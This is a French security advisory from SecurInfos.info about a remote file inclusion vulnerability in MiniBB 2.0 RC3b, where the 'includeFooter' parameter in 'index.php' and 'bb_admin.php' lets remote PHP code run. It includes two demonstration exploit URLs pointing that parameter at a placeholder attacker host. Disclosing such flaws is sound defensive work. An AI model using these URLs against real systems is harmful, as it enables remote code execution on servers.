SecurInfos.info - Bulletins de sécurité informatique, Alertes et Protection Impact : Exécution de commandes arbitraires via le réseau, Accès utilisateur via le réseau Exploit Inclus : OUI Version(s) : 2.0 RC3b Description : V4mu de Anomaly 1n The System a découvert une vulnérabilité dans MiniBB. Un utilisateur distant peut exécuter des commandes arbitraires sur le système cible. Les scripts 'index.php' et 'bb_admin.php' ne valident pas correctement l'entrée utilisateur dans le paramètre 'includeFooter'. Un utilisateur distant peut soumettre une URL construite spécifiquement pour entrainer le système cible à inclure et exécuter du code PHP arbitraire depuis un lieu distant. Le code PHP, incluant des commandes système, sera exécuté avec les privilèges du service web cible. Quelques URLs d'exploitation de démonstration sont fournies: http://[CIBLE]/[path_to_minibb]/index.php?includeFooter=http://[attaquant] http://[CIBLE]/[path_to_minibb]/bb_admin.php?includeFooter=ht tp://[attaquant] Joao Paulo a rapporté cette vulnérabilité. Impact : Un utilisateur distant peut exécuter du code PHP arbitraire et des commandes systèmes sur le système cible avec les privilèges du service web cible. Solutions : Aucune solution disponible à l'heure de cette publication. URL de l'éditeur : www.minibb.net/ Cause : Erreur de validation d'entrée, Erreur d'état OS : Linux (Tous), UNIX (Tous), Windows (Tous) Rapporté par : Joao Paulo (scu.java gmail.com) Les noms, marques et enseignes cités sur ce site sont la propriété de leurs déposants respectifs. |
SECURINFOS
|
|